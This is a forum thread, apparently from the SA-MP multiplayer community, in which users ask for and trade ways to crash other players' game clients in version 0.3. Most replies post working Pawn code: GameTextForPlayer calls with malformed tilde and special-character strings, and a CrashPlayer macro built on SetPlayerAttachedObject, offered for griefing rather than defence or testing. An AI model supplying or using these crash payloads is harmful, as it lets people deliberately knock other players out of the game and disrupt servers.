Crash Player in SAMP 0.3

Hi everyone, I need a way to crash a player in the 0.3 version of SAMP. I search in the forums but I can't find anything. It seems like the old method "create an invalid object" don't works now. there are some new way to crash a player?

Thanks!

I found one way to crash someone in the 0.3 version .

Code:
GameTextForPlayer(playerid, "~k~~INVALID_KEY~", 100, 5);
http://forum.sa-mp.com/index.php?top...1631#msg961631

I use
Code:
GameTextForPlayer(id, "~", 1000, 5);

Quote:
Originally Posted by cessil
I use
Code:
I've tried that but don't works to me. I don't know why.

Quote:
Originally Posted by Astaroth
Quote:
Originally Posted by cessil
I use
Code:
I've tried that but don't works to me. I don't know why.
That works some of the time. Do multiple ~ like
pawn Code:
GameTextForPlayer(playerid, "~gwsggds ~~vnsgndsdfn ~~~~~~~jjgdsjdgjsjjgd~fdsf03888*****~n~n~n~n~N~N`~", 1000, 5);

CLEAR! *Pzzztt* It's alive!

I cant crash a player using any of the methods above,instead, it crashes my sevrer -.-

Is there any other way to do this?

look into ravens crash method that use speciall caraters
it works on all my players

Code:
#define CrashPlayer(%0); SetPlayerAttachedObject(%0,0,%0,0);
Usage:
Code:
CrashPlayer(targetid);

pawn Code:
GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 1000, 0);
                        GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 2000, 1);
                        GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 3000, 2);
                        GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 4000, 3);
                        GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 5000, 4);
                        GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 6000, 5);
                        GameTextForPlayer(playerid, "•¤¶§!$$%&'()*+,-./01~!@#$^&*()_-+={[}]:;'<,>.?/", 7000, 6);